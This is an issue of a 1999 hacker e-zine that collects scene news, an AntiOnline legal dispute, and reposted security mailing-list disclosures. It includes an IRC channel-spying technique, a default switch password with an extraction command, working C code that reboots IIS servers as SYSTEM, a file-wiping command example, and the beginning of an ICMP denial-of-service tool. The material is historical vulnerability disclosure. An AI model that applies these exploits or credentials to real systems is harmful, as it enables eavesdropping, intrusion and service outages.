02.0 From the editor.#9
~~~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* Blech, fuck snow ... and overclocked chips that can't take the
*heat even with oversize fans and sinks duct taped to them ... ;)
*
*Moving right along, thanks for the continued support everyone and tty next time...
*/
printf ("EoF.\n");
}
w00t w00t w00t! ...
w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk.
1. A transcursion or transcendance into joy from an otherwise inert state
2. Something Cruciphux can't go a day without typing on Efnet
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
02.1 Demoniz trashcans his webboard
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Less than a month after the very cool bikkel security site closed down
demoniz has pulled the plug on his webboard which he left running after
closing down the main news site. Citing DoS attacks and spam as being
the #1 reasons, it turns my stomach just to think of this...pulled from
help net security's site.
http://net-security.org/
WEBBOARDS
by deepcase, Monday 8th Mar 1999 on 1:34 pm CET
Bikkel's Webboard which was first a project for a private webboard with
user login and password is finally down. In an email i recieved from
demoniz he said "The board is offline for good. I gave my best shot, but
it didn't work. The ingoing Denial of Service attacks on our server, the
spams and the threats made me so sick that I removed it. I wont provide a
service for a scene which is being dominated by little kids." Net Security
will think about setting up a new webboard, but we arent sure about this yet.
As a side note, we've set up a 'webboard' that is published by the beseen
company and it has seen no action as of yet, you might want to check it out
and we can see how well it works (or doesn't as the case may be.) - Ed
@HWA
03.0 AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Innerpulse.com...
AntiOnline.com Threatens Legal Action
Contributed by siko
Thursday - March 04, 1999. 05:52PM GMT
Following a rash of insults at AntiOnline.com, Founder John Vransisomething
has threatened legal action against Innerpulse.com. Innerpulse has this
statement for Mister AntiOnline:
Talk your shit, grab your gat, call your click. But do not ever threaten
Innerpulse with legal action unless you want some keys dropped.If you ain't
ever been to the ghetto, you wouldn't understand the ghetto. You stay the fuck
out of the ghetto. Don't try to tell me using the term 'antionline.com' is a
violation of copyright laws. Its a fucking domain name. As for why we throw
shit all over you name, this is a very good example of why. He went so far as to
say the letter he sent me could not be reproduced without express written
permission. Fuck that. You can surf on over to Innerpulse but thats all, just surf
on by. It would be the biggest bitch move in Internet history to launch a legal
suit at opposition just because your feelings are hurt. Stop trying to be the
Microsoft of the underground community. Nothing will be removed. Nothing
will be discontinued. And I don't care if someone was stupid enough to invest
60 billion in you. Why don't you go to antihell.com. Punk ass.
Yeah, I posted it, What's Up Now Monkey? <link> http://innerpulse.com/jp.txt
(The text from the above link appears in its entirety below - Ed)
"<pre>aka Siko:
I am sending you this letter to officially request that the content that
relates to AntiOnline currently posted at the following URL be removed
promptly: http://www.innerpulse.com/
By references in your pages, I am sure that you are aware that
"AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold
rights to. The language used on your page is not only inflammatory, it is
flat out libelous. That content, combined with references to "AntiOnline"
is what has led me to write this letter.
While comedic parody is a protected first amendment right, knowingly
printing false, libelous information about a company, in the context of it
being news, so that others may believe it to be fact, is not. We have
received several e-mails from individuals questioning whether some of the
information posted on your page, is factual news, or fictional writing.
Also, the re-print of trademarks which are the property of another
company, without written authorization, do not fall under first amendment
rights.
By sending you this letter, I am hoping that we can settle this matter
without me being forced to seek a legal remedy. However, if you are not
willing to cooperate with my requests, I may very well be forced into
finding legal recourses, which may include a civil lawsuit. You will
receive
no further communications from me directly. If the content is not removed
within 24 hours, this matter will be handed over to my legal council.
Legal action may be filed shortly there after to recover damages done to
AntiOnline's trade and reputation.
A copy of this letter has been sent "blind carbon" to several third party
individuals, so that it may be established that I have given you
opportunity to remove the content voluntarily.
If you have any questions regarding my request, you may contact me via an
e-mail to jp@antionline.com or by phone at (724)773-0940.
I would like to thank you in advance for what I hope will be a prompt
response to my requests.
Very Truly Yours,
Mr. John Vranesevich
General Partner, AntiOnline
--------------------------------------------------------------------------------
This letter is copyright 1999, AntiOnline LLP
Reprint without written authorization is strictly prohibited...
</pre>"
Our Reply to JayPee <link> http://innerpulse.com/jp-reply.txt
Hi,
After I saw the e-mail you sent to siko I wanted to give you my idea
on this issue, as I provide web hosting for Innerpulse.com and
occasionally work on the website. Response below.
> aka Siko:
>
> I am sending you this letter to officially request that the content that
> relates to AntiOnline currently posted at the following URL be removed
> promptly: http://www.innerpulse.com/
If you want to send an official letter, you don't use e-mail. You can
redirect official letters to our main administrative NOC at:
[CubeSoft Communications]
Cp2, Rr2, H.a.m
Magdalen Islands, QC
G0B 1K0 CANADA
> By references in your pages, I am sure that you are aware that
> "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold
> rights to. The language used on your page is not only inflammatory, it is
> flat out libelous. That content, combined with references to "AntiOnline"
> is what has led me to write this letter.
First of all, I think you should be consulting a lawyer about this. I
did, and I can tell you that mentionning the name "AntiOnline" in a news
article is not libelous; as we never even put a link to your website (which
would have not been legally wrong either). Is mentionning "Microsoft" in a news
article libelous? I don't think so.
> While comedic parody is a protected first amendment right, knowingly
> printing false, libelous information about a company, in the context of it
> being news, so that others may believe it to be fact, is not. We have
> received several e-mails from individuals questioning whether some of the
> information posted on your page, is factual news, or fictional writing.
We don't want to take responsibility of the stupidity of your website's
visitors. Tell them to redirect their comments and question to
contact@innerpulse.com. My personal opinion is that it is quite obvious whether an article is
true or not; Innerpulse adds a touch of humor to it, that's what makes Innerpulse
different.
> Also, the re-print of trademarks which are the property of another
> company, without written authorization, do not fall under first amendment
> rights.
Ahh I'm beginning to think you are referring to `AntiOnline-O-Rama' from
the INN features section. Do you seriously think I would have wasted my
time recopying AntiOnline's frontpage entirely?
This may be not in the scope of your technical skills, but that is
actually a link to a CGI script which simply acts as a proxy - it prints information
directly from AntiOnline.com, doing some word search/replaces in the process. By
changing the parameter you can do the same with any other website.
> By sending you this letter, I am hoping that we can settle this matter
> without me being forced to seek a legal remedy. However, if you are not
> willing to cooperate with my requests, I may very well be forced into
> finding legal recourses, which may include a civil lawsuit. You will
> receive
> no further communications from me directly. If the content is not removed
> within 24 hours, this matter will be handed over to my legal council.
> Legal action may be filed shortly there after to recover damages done to
> AntiOnline's trade and reputation.
I've been in that situation before, just an advice: don't even think
about this, this will pass as a violation of free speech. And by the way, who
do you want to sue exactly?
> A copy of this letter has been sent "blind carbon" to several third party
> individuals, so that it may be established that I have given you
> opportunity to remove the content voluntarily.
I don't think so, John.
> If you have any questions regarding my request, you may contact me via an
> e-mail to jp@antionline.com or by phone at (724)773-0940.
>
> I would like to thank you in advance for what I hope will be a prompt
> response to my requests.
>
> Very Truly Yours,
> Mr. John Vranesevich
> General Partner, AntiOnline
@HWA
03.1 The FPSC-IRCD.txt advisory.
~~~~~~~~~~~~~~~~~~~~~~~~~~~
The FPSC-IRCD.txt advisory.
---------------------------
By: syg of the FPSC @3/7/98
ircd@FPSC.hemp.net
http://FPSC.hemp.net
Program affected:
IRCD
Versions affected:
All hybrid and other EFnet IRCD versions. Probably others.
Problem:
According to the date of this file, thier is a few bugs in hybrid IRCD
and maybe others. I've checked DALnet's source and it seems thiers is fixed
and not affected. The bug is in match.c of the source code and starts on line
204 at 'tolowertab[]'. Note the line that consists of the following:
"'t', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~',". Then go to line 238
in match.c to 'touppertab[]'. Note the line that reads:
"'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^'," and look at the two
lines. If you notice, it takes the '{' char and defines its uppercase char as
'[' as along with defining '|' to '\', '}' to ']', and '~' to '^'. What this
means is thier the same characters in channel names and nicknames.
Now what can you do with this in such a way it would be a problem?
You can spy on channels that consist of any one of those 8 characters below:
1) { --Defined as LowerCase [
2) [ --Defined as UpperCase {
3) } --Defined as LowerCase ]
4) ] --Defined as UpperCase }
5) | --Defined as LowerCase \
6) \ --Defined as UpperCase |
7) ~ --Defined as LowerCase ^
8) ^ --Defined as UpperCase ~
This problem and mIRC make a dangerous combination. Lets say a bunch of your
friends hang in #mIRC] and you run BitchX. All you have to do is join
#mIRC} and thier mIRC clients wont see you join the channel which means you
are a ghost and therefore are invisible. Another example would be...
two people are in #Love^2 and you ran BitchX. All you would have to do is
join #Love~2 and they wont see you join, therefore you can spy on thier
conversation all night long. Now if one of the mIRC people happened to type
"/names #mIRC]" or "/names #Love^2" you would magically pop up in the nick
list of the channel. That is also the same if someone joins the channel
after you have joined, you will show up in thier names list therefore it will
put you in thier nick list in the channel window. Be creative and have fun.
Logs:
The "->->->" is me telling you whats going on.
->->-> In mIRC I typed /join #[ with the nick mIRC-1
*** Now talking in #[
->->-> No one is in the channel but me in the nick list.
->->-> Then I looked in my status window and got the join info.
#[ @mIRC-1
#[ End of /NAMES list.
#[ created on Thu Feb 25 14:13:45
->->-> Then in another mIRC client I typed /join #{ with the nick mIRC-2
*** Now talking in #{
->->-> No one is in the channel but me in the nick list.
->->-> Then I looked in my status window and got the join info.
#[ mIRC-2 @mIRC-1
#{ End of /NAMES list.
#[ +
#[ created on Thu Feb 25 14:13:45
->->-> NOTE: I can't see mIRC-1 in the nick list in the channel.
->->-> I also can't see mIRC-2 in mIRC-1's nick list.
->->-> So basically it's like two different channels when you are in mIRC.
->->-> Let's now bring bitchX into play...
->->-> In BitchX under the nick BitchX-1 i typed /join #[
BitchX-1 [test@FPSC.hemp.net] has joined #[
[Users(#[:3)]
[ BitchX-1 ] [ mIRC-2 ] [@mIRC-1 ]
Channel #[ was created at Thu Feb 25 14:13:45 1999
BitchX: Join to #[ was synced in 0.391 secs!
->->-> Now under mIRC-1's client I saw...
*** BitchX-1 (test@FPSC.hemp.net) has joined #[
->->-> Which I should have because we are both in #[
->->-> But on the other hand, under mIRC-2's client( The one in #{ )...
->->-> I didn't see BitchX-1 join.
->->-> And as you can see, BitchX-1 see's mIRC-2 in the channel #[
->->-> Now let me type with all three of them.
->->-> Under all three clients I will type thier nick and chan to the channel.
->->-> Under BitchX-1's client I saw all three clients talk...
<mIRC-1> mIRC-1 #[
<mIRC-2> mIRC-2 #{
<BitchX-1> BitchX-1 #[
->->-> Under mIRC-1's client I saw myself and BitchX-1 type (We are both in #[)
<mIRC-1> mIRC-1 #[
<BitchX-1> BitchX-1 #[
->->-> Under mIRC-2's client I saw myself type only ( Im in #{ )
<mIRC-2> mIRC-2 #{
->->-> As you can see mIRC-2 is being spy'd on by the BitchX client.
->->-> End of logs.
Sollution:
The fix would be to simply edit /src/match.c of the source code. DALnet
seems to have a nice match.c at ftp.dal.net in df467.tgz if you EFnet staff
need any ideas. We all hope to see this fixed in your next release of hybrid.
Final Notes:
IRCD coders and staff members of all networks and all IRCD versions need
to check your source for this bug and fix it before it gets abused... maybe it
was you in #^locals^ giving your phone number out to a friend which was being
spy'd on by another local enemy. Other than that, everyone keep up the good
work and so long. Also, thanks to sate for helping me test this out.
Questions/jobs/info/etc: ircd@FPSC.hemp.net -syg
@HWA
04.0 Pentagon under attack
~~~~~~~~~~~~~~~~~~~~~
March 7th, 1999
From http://www.hackernews.com/
Pentagon investigates Russian cyberattacks
contributed to HNN by Bronc
A probe has been launched into recent efforts of crackers attempting to
access Pentagon computer systems. Pentagon officials are unsure if this
is a coordinated attack or the work of separate indiv
iduals.
Early indications show that many of the attacks have originated in Russia
and may have had the assistance of a insider. No classified networks have
yet been breached. U.S. Deputy Defense Secretary John Hamre has been
quoted as saying "It is a major concern." (Ed Note: This is the same John
Hamre who last year was quoted as saying "This is the most coordinated
attack we have seen to date" when referring to attacks on government
systems by three teenagers.)
Follow up here:
http://abcnews.go.com/sections/world/DailyNews/pentagonrussia990304.html
http://www.techserver.com/story/body/0,1634,24763-40126-294330-0,00.html
http://www.msnbc.com/news/246801.asp
http://www.smh.com.au/news/9903/05/breaking2/news1.html
And from Innerpulse.com; www.innerpulse.com
United States: Cyberwar?
Contributed to Innerpulse by siko
Sunday - March 07, 1999. 06:10PM GMT
Innerpulse has decided not to join the media inflated 'Cyberwar' reporting
until today. We have been doing extensive research and have discovered some
exclusive details.
We all know the so called 'facts'. Coordinated attacks on certain servers have
officials at the Pentagon looking for answers, and quickly. What certain people
forget, is that the man who said this is the most organized attack to date, is also
the man that said a 16 year old kid named 'Makeveli' had also launched an
extremely organized attack on government servers. For those who aren't into
the urban musical subculture, Makeveli most likely came from the popular
rapper, Tupac's influence. They have stated the attacks are coming from
Canada and Thailand amongst others. Yet they can not trace any further.
Sorry, if you can tell the country than you have the IP, and the ability to find the
source.
The United States is not at Cyberwar with anyone but the media, who took a
couple of failed hack attempts and turned it into World War III. Innerpulse has
conducted various interviews and can now finger the source of this terror. His
name is John Vranesevich, which traces back to packetz.antionline.com. In an
effort to get more publicity for breaking a story, he blew up a situation leading
many respected news outlets into believeing this was actually as blown out of
proportion as he made it sound. And on top of that, they pick Hamre, the man
who called an Undernet hacker named 'Makeveli', a serious threat the the
United States National Security.
The Pentagon may be experiencing more attacks lately. This is not blown out of
proportion. But if you take a moment to question the motives of people who
would attempt to crack into a government server.. Perhaps because it gains you
recognition and fame as it has done for so many in the past? This is the same
reason antionline.com gets lots of crack attempts every day, because almost
everyone in the 'hacker' community wants to be known for breaking the site
that sold out.
The United States is not currently involved in a Cyber War, never has been, and
most likely will not be in any of our reader's lifetimes.
But, if someone really cracks a Pentagon server and fires a missile at me, boy
won't I feel silly.
And a fairly intelligent article with little FUD from ABC news...
http://www.abcnews.go.com/sections/tech/DailyNews/pentahack990309.html
Pentagon Attacks Overblown?
Hackers Complain Government Computers Over-Sensitive
By Michael J. Martinez
ABCNEWS.com
March 9 Last week, the Pentagon reported
that over the last several months its computer
systems have withstood an unprecedented and
concerted series of external attacks.
U.S.-based hackers might simulate an attack from abroad by routing
their signals through a series of far-flung servers. (ABCNEWS.com)
Deputy Defense Secretary John Hamre confirmed the
attacks, calling them a major concern. Pentagon officials
stated that the electronic infiltrations have come from
abroad most likely Russia. To Pentagon watchers, and to members of the
loosely knit hacker fraternity in the United States, those claims
sounded familiar.
Terrorists or Teens?
Last February, Hamre announced that the Pentagon was undergoing
the most intense, coordinated cyberattack it had ever seen. Over a
two-week period, unknown hackers launched coordinated attacks against
hundreds of military domains and servers.
After weeks of investigation, the culprits were nabbed. They turned
out to be an 18-year-old Israeli computer enthusiast with a lot of
time on his hands, and two teenagers from California who were using
readily available software tools downloaded from the Internet to
discredit the Pentagons computer security. No hackers claimed credit
for the latest assaults; there was no bragging in IRC chat rooms or
on Web pages, as typically happens after well-publicized computer
attacks on government systems.
That could mean a number of different things, says Dr. Peter Tippett,
president of ISCA, Inc., a computer security firm. The attacks arent
that bad, the person doing it doesnt want to take credit, or the
attacks are coming from overseas. The latest assaults could have
come from foreign governments, terrorist organizations or from the
proverbial mischievous teenager.
Recon vs. Frontal Assault What exactly constitutes an attack? Hackers
customarily scan remote computer systems, looking for security holes
through which to send or retrieve data. Tools for such scans are
readily available for downloading from the Internet.
These scanners basically take known holes and hit a server, one after
another, asking it if these holes are open, says an independent hacker
known as Bronc Buster. They may or may not be there, but as far as logs
on systems will show, unless you are an experienced admin and can tell
the difference, you are being attacked.
The Pentagon, however, does not differentiate between scans, which is
essentially cyberspace reconnaissance, and full attacks, when a malicious
system cracker actively attempts to break through security. Tippett
points out that scans are useful for later attack, and that determined
hackers have found ways to conduct scans without setting off alarms.
Most servers have thousands of accounts, and thus thousands of entry
points. If a hacker takes his time, and only pings a few entry points
every so often, he can usually avoid notice.
In recent congressional testimony, Hamre said Defense Department
computers are attacked upwards of 60 times per week, with about 10 such
attacks requiring additional investigation. He did not differentiate
between scans or infiltration attempts.
From Russia With Love
The theory that the recent attacks came from Russia is also questionable.
When it comes to the Internet, geography quickly becomes irrelevant.
Hacking tools, some of which are readily available online, could allow a
would-be hacker to fake his own locale information, or channel his attack
through servers all around the world. I dont know how the Pentagon would
know where the attacks come from, Tippett says. If you have access to
enough servers, its relatively easy to re-route your connection to make
it appear youre in Russia, when you could just be down the street.
Rep. Curt Weldon, R-Pa., who chairs the subcommittee of the House
Armed Services Committee where Hamre testified, acknowledges that the
starting point of the recent computer assaults still in doubt. But he
contends the new attacks represent a new kind of warfare, in which less
powerful nations could gain an edge against the United States by hacking
into and knocking out key computer systems. This appears to be a
coordinated effort to break into our computer system, and we not giving
the problem the kind of visibility it needs, Weldon says. This Y2K thing
is a piece of cake compare to this.
OXBlood Ruffin, foreign minister for the hacker group Cult of the
Dead Cow, has another view. It smells like someone is looking for increased
budgets, Ruffin wrote in an e-mail, calling Hamres alarms a typical crying
game from the military. Hacking Into a Government Computer According to a
Philadelphia-based hacker who calls himself El Diablo, government computers
are far too quick to register an attack. El Diablo, affiliated with the
HologramNation hacker group, should know: he accessed the White House Web
server.
Instead of using a a Web browser, El Diablo accessed the whitehouse.gov
host address via Telnet. Telnet is a common way for a user to log directly
into a server, accessing the servers systems remotely. Once dialed in,
El Diablo encountered the following warning: You are about to access a U.S.
Government computer system. Access to this system is restricted to authorized
users only. Anyone who accesses this system without authorization, or exceeds
authorized access, could be subject to a fine or imprisonment, or both, under
Public Law 98-473.
The message went on to say that the user was being monitored.
The computer then asked for a username and password, at which point El Diablo
exited. What this seems to say is that I just hacked into the government
computers, he says. The hackers [accessing Pentagon computers] could have
simply done that, and the government could have blown this waaaaaay out of
proportion.
Many people Telnet into their work computers its not some obscure
hacker tool. Yet the White House says what El Diablo did is a potential attack.
Im sure lots of people Telnet into that server, either to just have a look,
or they access it by mistake, and thats OK, said White House spokesman Mark
Kitchens. But that is still considered an attempt at breaching security.
@HWA
04.1 Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 5 Mar 1999 12:19:59 -0800
From: JEK <jkolde@EARTHLINK.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Cheyenne InocuLAN for Exchange plain text password still there
This dates back to Ron Watkins' post on 12/16/98 regarding the plain text
account name/password left in the exchverify.log file by the installation of
Cheyenne's Anti-Virus Agent for Exchange.
Quote from Ron:
"I was called on Monday by Brian Linton at Computer Associates. He says
that the plaintext admin password was put into c:\exchverify.log by earlier
versions of the Arcserve Exchange client, but that build 57 (the most recent
version) puts only the length there. It does not erase that file as new
installs are done, but rather appends, which is why some folks still had
that plaintext password even after installing the most recent build."
I am currently testing AV Agent for Exchange and installed what I was told
was the most recent version (build 64) on a clean NT 4.0/SP4/Exchange 5.5
server running InocuLAN for NT 4.0 (build 375). This was a fresh build and
*not* upgraded from earlier versions of any software. The exchverify.log
file is still there and still contains the account name and password in
clear text - NOT merely the length as stated above.
JEK, MCSE
@HWA
04.2 Default passwords in Bay networks switches
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 10 Mar 1999 14:48:58 -0800
From: Jan B. Koum <jkb@BEST.COM>
To: BUGTRAQ@netspace.org
Subject: Default password in Bay Networks switches.
Ok.. so you would think after 3Com $%#& up last year of inserting
default password into firmware vendors would learn their lesson?
[See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant]
Hah! Welcome to the world of strings and Bay Networks firmware
files. I have looked at some bay networks switches and see that
the following have default password of "NetICs"
BayStack 350T HW:RevC FW:V1.01 SW:V1.2.0.10
BayStack 350T HW:RevC FW:V1.01 SW:V2.0.0.15
These however I was not able to find defaults for:
BayStack 350-24T HW:RevA FW:V1.04 SW:V1.0.0.2
Bay Networks BayStack 303 Ethernet Switch
BayStack 28115/ADV Fast Ethernet Switch
If you have firmware images for the above, just
% strings *.img | grep -B5 "Invalid Password"
Something similar to this command might give you the passwd.
Of course I don't have to tell you about how bad it is when
someone can control your network infrastructure (switches).
I don't have much experience with Bay hardware (in fact, I have
none - someone at work just asked me to help them get into a
switch for which they forgot the password). If someone can
shed some light on this topic, it would be great.
And yes, I consider this to be a backdoor - wouldn't you call it
a backdoor if Solaris had default password for root logins?
How can vendors in 1999 even THINK about something as stupid as
inserting a default password like this into a switch!?!?
Granted - I am almost sure Bay didn't have evil intentions for
the use .. but still. I am speechless.
-- Yan
P.S. - Greetz to the inhabitants of #!adm and #!w00w00
------------------------------------------------------------------------------
Date: Wed, 10 Mar 1999 17:06:05 -0700
From: Dax Kelson <dkelson@INCONNECT.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Default password in Bay Networks switches.
On Wed, 10 Mar 1999, Jan B. Koum wrote:
> Ok.. so you would think after 3Com $%#& up last year of inserting
> default password into firmware vendors would learn their lesson?
> [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant]
>
> Hah! Welcome to the world of strings and Bay Networks firmware
> files. I have looked at some bay networks switches and see that
> the following have default password of "NetICs"
The Bay Networks case number for this bug/oversight is: 990310-614
Normally "backdoor" passwords on Bay gear only work through the console.
Dax Kelson
Internet Connect, Inc.
------------------------------------------------------------------------------
Date: Wed, 10 Mar 1999 17:16:53 -0800
From: Jon Green <jogreen@NORTELNETWORKS.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Default password in Bay Networks switches.
> And yes, I consider this to be a backdoor - wouldn't you call it
> a backdoor if Solaris had default password for root logins?
> How can vendors in 1999 even THINK about something as stupid as
> inserting a default password like this into a switch!?!?
> Granted - I am almost sure Bay didn't have evil intentions for
> the use .. but still. I am speechless.
This was fixed in version 2.0.3.4 of the BS350 code last November.
The backdoor is still there for console access, but not for telnet.
This problem only affected the Baystack 350T and 350F, it did not
affect the 350-24T or 450. Also, note that the 350 has always had the
ability to limit telnet logins to certain source addresses; it is
recommended that that feature be used.
Software upgrades for the 350 can be found at
http://support.baynetworks.com under Software. If you don't
have a support contract, call (800) 2LANWAN.
-Jon
-------------------------------------------------------------------
Jon Green 4301 Great America Pkwy
Senior Competitive Test Engineer Santa Clara, CA 95054
Nortel Networks (408) 495-2618 Voice
jogreen@nortelnetworks.com (408) 495-4540 Fax
-------------------------------------------------------------------
@HWA
04.3 ISAPI Exploit code
~~~~~~~~~~~~~~~~~~
Date: Tue, 9 Mar 1999 10:54:47 -0500
From: Fabien Royer <fabienr@BELLATLANTIC.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM
> -----Original Message-----
> From: Patrick CHAMBET [mailto:pchambet@club-internet.fr]
> Sent: Tuesday, March 09, 1999 5:27 AM
> To: Fabien Royer
> Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: Re: ISAPI Extension vulnerability allows to execute code as
> SYSTEM
>
>
> Any proof ? Any sample ? Any work around ?
> How can we test our servers ?
Using VC++, create an ISAPI extension project and call it CRbExtension.
Replace GetExtensionVersion() and Default() with the code below. Compile it
to something simple, like rb.dll.
Place it on your web server and invoke it from your browser like this
http://your.machine.name/scripts/rb.dll?
Note: if you are using IE4.0, don't call this from the machine that is
running the web server otherwise, the next time you log in, IE will recall
the last URL and you'll reboot again.
The workaround is to NEVER give users (or customers) the ability to use
ISAPI extensions if you allow them to upload CGIs to customize their home
page. An .exe on the other hand is much safer (is coded correctly).
Fabien.
BOOL CRbExtension::GetExtensionVersion(HSE_VERSION_INFO* pVer)
{
HANDLE hToken; // handle to process token
TOKEN_PRIVILEGES tkp; // pointer to token structure
// Get the current process token handle so we can get shutdown // privilege.
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
// Get the LUID for shutdown privilege.
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1; // one privilege to set
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Get shutdown privilege for this process.
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0);
ExitWindowsEx(EWX_REBOOT,0);
// Disable shutdown privilege. tkp.Privileges[0].Attributes = 0;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0);
// Call default implementation for initialization
CHttpServer::GetExtensionVersion(pVer);
// Load description string
TCHAR sz[HSE_MAX_EXT_DLL_NAME_LEN+1];
ISAPIVERIFY(::LoadString(AfxGetResourceHandle(),IDS_SERVER, sz,HSE_MAX_EXT_DLL_NAME_LEN));
_tcscpy(pVer->lpszExtensionDesc, sz);
return TRUE;
}
void CRbExtension::Default(CHttpServerContext* pCtxt)
{
StartContent(pCtxt);
WriteTitle(pCtxt);
*pCtxt << _T("Reboot<br>");
EndContent(pCtxt);
}
>
> Patrick Chambet
> IBM Global Services
>
>
> >There's a vulnerability in IIS (and other WEB servers executing
> as SYSTEM)
> >that allows to execute an ISAPI extension in the security context of the
> >server itself instead of the security context of IUSR_WHATEVER.
> How is this
> >possible: when the server loads an ISAPI extension the first
> time, it calls
> >GetExtensionVersion(). During the call to this function, an attacker can
> >execute any code as SYSTEM. This is a problem if you're an ISP doing
> hosting
> >with web servers offering ISAPI support (IIS, Apache 1.3.4, etc.
> ) because
> >any user allowed to place a "CGI" on the server can take over. Of course,
> >this problem is not limited to ISPs.
> >Fabien.
-=- Prior Discussion & further details ;
Date: Mon, 8 Mar 1999 11:27:48 -0500
From: Fabien Royer <fabienr@BELLATLANTIC.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM
There's a vulnerability in IIS (and other WEB servers executing as SYSTEM)
that allows to execute an ISAPI extension in the security context of the
server itself instead of the security context of IUSR_WHATEVER. How is this
possible: when the server loads an ISAPI extension the first time, it calls
GetExtensionVersion(). During the call to this function, an attacker can
execute any code as SYSTEM. This is a problem if you're an ISP doing hosting
with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because
any user allowed to place a "CGI" on the server can take over. Of course,
this problem is not limited to ISPs.
Fabien.
--------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 00:32:03 -0500
From: Fabien Royer <fabienr@BELLATLANTIC.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM
> -----Original Message-----
> From: Scott L. Krabler [mailto:scottk@visi.com]
> Sent: Monday, March 08, 1999 11:41 PM
> To: Fabien Royer; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: RE: ISAPI Extension vulnerability allows to execute code as
> SYSTEM
>
>
> By this, I'm assuming the required safeguard would be to only implement
> ISAPI filters whose contents are known. Since ISAPI filters can only be
Typically, filters and extensions fulfill different purposes. For instance,
you would not implement an complete WEB based application as a filter for
performance reasons. Filters see all http "traffic" while extensions only
see the http traffic that is directed to them.
Unless you have written the filter yourself (or someone trusted in your
organization), you can't know if a filter is 100% secure either.
> installed locally(?) there shouldn't be any general risk. Yes?
This is not that simple. You can remotely install a filter under IIS if you
can cause the following sequence of events to occur:
1) Place the filter .dll in a location accessible from the web server.
2) Update the registry to register the new filter.
3) Cause a reboot of the machine or stop/start IIS.
All of this can be done from the GetExtensionVersion() call mentioned
earlier.
Finally, you can host a filter *AND* an extension in the same .dll.
Fabien.
>
> -----Original Message-----
> From: Windows NT BugTraq Mailing List
> [mailto:NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM]On Behalf Of Fabien Royer
> Sent: Monday, March 08, 1999 10:28 AM
> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM
>
>
> There's a vulnerability in IIS (and other WEB servers executing as SYSTEM)
> that allows to execute an ISAPI extension in the security context of the
> server itself instead of the security context of IUSR_WHATEVER.
> How is this
> possible: when the server loads an ISAPI extension the first
> time, it calls
> GetExtensionVersion(). During the call to this function, an attacker can
> execute any code as SYSTEM. This is a problem if you're an ISP
> doing hosting
> with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because
> any user allowed to place a "CGI" on the server can take over. Of course,
> this problem is not limited to ISPs.
> Fabien.
>
--------------------------------------------------------------------------------
Date: Wed, 10 Mar 1999 18:28:24 -0500
From: Fabien Royer <fabienr@BELLATLANTIC.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM
Sure, however the executable that you are going to execute will run in a
separate address space and if it is spawned by IIS, it will run in the
security context of IUSR_xxx instead of SYSTEM. This is the *major*
difference between what you can do with the .dll approach and the .exe
approach.
Fabien.
> I don't know that .EXE's are that much safer. How about this:
>
> I upload 4nt.exe (Command.Com/CMD.Exe replacement program)
> I write an EXE that calls it and runs the command 'reboot'
> or even a 'del /zsx c:\*.*' (Which will recursively delete all
> files that aren't currently in use)
>
> Same idea ... different way about it.
>
> Being a developer and having the tools available, I require that
> I get to compile the code myself. That way, I can scan through
> the code to see if it's trying to do anything malicious.
> Granted, this isn't 100% foolproof, but it does help!
>
> Charlie
@HWA
04.4 Winfreez.c new exploit code for win9x and NT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The full original source code is followed by a Solaris version and
further discussion, from Packetstorm/Bugtraq.
(March 11th 1999)
http://www.genocide2600.com/~tattooman/new.shtml#latest
/*
WinFreez.c by Delmore <delmore@moscowmail.com>
ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box
in LAN.
Usage: winfreez sendtoip sendfromip time
